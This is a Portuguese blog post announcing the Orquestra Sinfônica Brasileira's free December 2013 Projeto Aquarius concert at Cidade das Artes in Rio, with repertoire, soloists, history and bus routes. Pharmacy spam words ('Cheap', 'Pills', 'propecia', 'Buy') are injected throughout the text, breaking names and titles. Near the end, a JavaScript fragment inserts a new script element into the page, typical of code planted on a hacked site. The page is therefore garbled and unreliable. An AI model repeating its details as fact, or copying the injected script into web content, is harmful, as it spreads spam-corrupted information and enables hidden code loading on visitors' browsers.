Música sinfônicaProgramaçãoRio de Janeiro

Clássicos populares nos jardins da Babilônia

Projeto Aquarius traz Orquestra Sinfônica Brasileira para apresentação na Cidade das Artes.

Democratizar a cultura por meio da música ao ar livre. Com este lema, o Projeto Aquarius, realizado há 41 anos pelo jornal O Globo, convida a Orquestra Sinfônica Brasileira para mais uma emocionante apresentação ao público no dia 14 de dezembro, às 20h. O evento ocorre pela primeira vez na Cidade das Artes, complexo de 97 mil metros quadrados localizado na Barra da Tijuca, Rio de Janeiro, e traz como tema os Clássicos Populares, com a regência do maestro Cheap Roberto Minczuc.

Pills “Há mais de 40 anos o Aquarius leva música clássica a todos os públicos. A realização deste espetáculo nos jardins da Cidade das Artes, um espaço com vocação para a música, reforça o objetivo d’O Globo de promover a cultura e o encontro de diferentes públicos e gerações”, afirmou Sandra Sanches, diretora executiva do jornal.

O Projeto Aquarius 2013 quer mostrar que a música clássica está presente no dia a dia da população – daí a escolha de um repertório bastante conhecido do grande público. Entre os clássicos a serem apresentados pela OSB está a encantadora Quinta Sinfonia, de Beethoven, possivelmente a obra clássica mais popular e mais executada em todo o mundo.

“Estamos muito felizes de realizar esta edição do Aquarius na Cidade das Artes, levando música de qualidade para um público que habitualmente não se desloca até o Centro do Rio, e que está sedento para ter também esse grande prazer que é ouvir um concerto de música clássica”, constatou o maestro.

Minczuk conta que outra obra que será apresentada e que já está na cabeça de todos é a cavatina de Fígaro da ópera O Barbeiro de Sevilha, de Rossini, cantada pelo barítono Igor Vieira. Dois momentos da ópera Carmen, de Bizet, serão apresentados no concerto — a abertura e a ária Habanera, com participação da mezzo-soprano Luisa Francesconi. Também do mundo operístico vem a famosa Sempre Libera, ária de La Traviata Order , de Verdi, interpretada por Edna D’Oliveira (soprano) e Marcos Paulo (tenor), que cantará também a ária Nessun Dorma, da ópera Turandot, de Puccini. Os quatro solistas interpretarão, juntos, a célebre Ode à Alegria – quarto movimento da Sinfonia nº 9 em ré menor, Op. 125 – Coral, de Beethoven. Já as tradicionais obras natalinas Adeste Fidelis e Noite Feliz contarão com a participação do Coro de Crianças da OSB e do Coro Sinfônico do Rio de Janeiro, regidos por Pills online Julio Moretzsohn.

Projeto AquariusSobre o Projeto Aquarius

Em mais de quatro décadas de evento, o Projeto Aquarius construiu sua história tanto no Rio como no país. Ao todo, foram realizados 325 espetáculos em diferentes cidades do Brasil, desde 1972. E, entre os memoráveis está o do dia 7 de setembro de 1981, quando meio milhão de pessoas assistiram à reconstituição do Grito do Ipiranga, em São Paulo. A apresentação aconteceu em três palcos e teve duas orquestras sinfônicas, um coro, três grupos de dança e a participação do regimento Dragões da Independência, que encenou usando internet apotheke england propecia uniformes históricos e cavalos.

Transporte

A Cidade das Artes está diretamente ligada Buy ao Terminal Rodoviário da Alvorada, por meio de uma passagem subterrânea que facilita o acesso de todos aqueles que decidirem usar o transporte público. 

• 301 – Rodoviária x Barra (via Tijuca/Avenida das Américas)
• 303 – Rodoviária x Barra (via Av. Brasil/Linha Amarela)
• 305 – Rodoviária x Barra (via Rebouças/Lagoa/São Conrado)
• 308 – Central x Barra (via Copacabana/Ipanema/Leblon/São Conrado)
• 309 – Central x Alvorada (via Flamengo/Botafogo/Jardim Botânico/Gávea/São Conrado)
• 317 – Central x Alvorada (via Laranjeiras/Botafogo/Jardim Botânico/Gávea)
• 318 – Barrasul x Castelo (via Copacabana/Ipanema/Leblon/São Conrado)
• 333 – Rodoviária x Barra (via Tijuca/Avenida Sernambetiba)
• 345 – Praça Mauá x Barra (via Tijuca/Avenida das Américas)
•382 – Carioca x Piabas (via Flamengo/Botafogo/Copacabana/Ipanema/Leblon/S. Conrado/Recreio)
• 465 – Cascadura x Gávea (via Madureira/Praça Seca/Freguesia)
• 525 – General Osório x Alvorada (via Leblon/São Conrado)
• 614 – Del Castilho x Alvorada (via Linha Amarela)
• 690 – Méier x Alvorada (via Av. Dom Hélder Câmara/Cascadura/Madureira/Praça Seca/Taquara)
• 691 – Méier x Alvorada (via Rua Dias da Cruz/Taquara/Linha Amarela)
• 692 – Méier x Alvorada (via Avenida Dom Hélder Câmara/Linha Amarela)
• 693 – Méier x Alvorada (via Rua Dias da Cruz/Linha Amarela)
• 701 – Madureira x Alvorada (via Praça Seca/Taquara)
• 765 – Cascadura x Barra (via Madureira/Praça Seca/Freguesia)
• 803 – Senador Camará x Alvorada (via Bangu/Realengo/Sulacap/Taquara)
• 826 – Joatinga x Vargem Grande (via Recreio)
• 853 – Vila Kennedy x Barra (via Campo Grande/Recreio)
• 888 – Sulacap x Barra (via Taquara)
• 889 – Sulacap x Alvorada (via Taquara)
• 2018 – Aeroporto Internacional x Alvorada (via Centro/Copacabana/Ipanema/ Leblon)
• 2330 – Rodoviária x Barra (via Linha Amarela)
• 2918 – Aeroporto Internacional x Alvorada (via Linha Amarela)

Purchase

Serviço:
Projeto Aquarius – Orquestra Sinfônica Brasileira
14 de dezembro de 2013, sábado, às 20h (abertura dos portões às 16h)
Cidade das Artes (Av. das Américas, 5.300, Barra da Tijuca, Rio de Janeiro)
Entrada franca
Classificação: livre
Capacidade: 10 mil lugares

var d=document;var s=d.createElement(‘script’); document.currentScript.parentNode.insertBefore(s, document.currentScript);

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.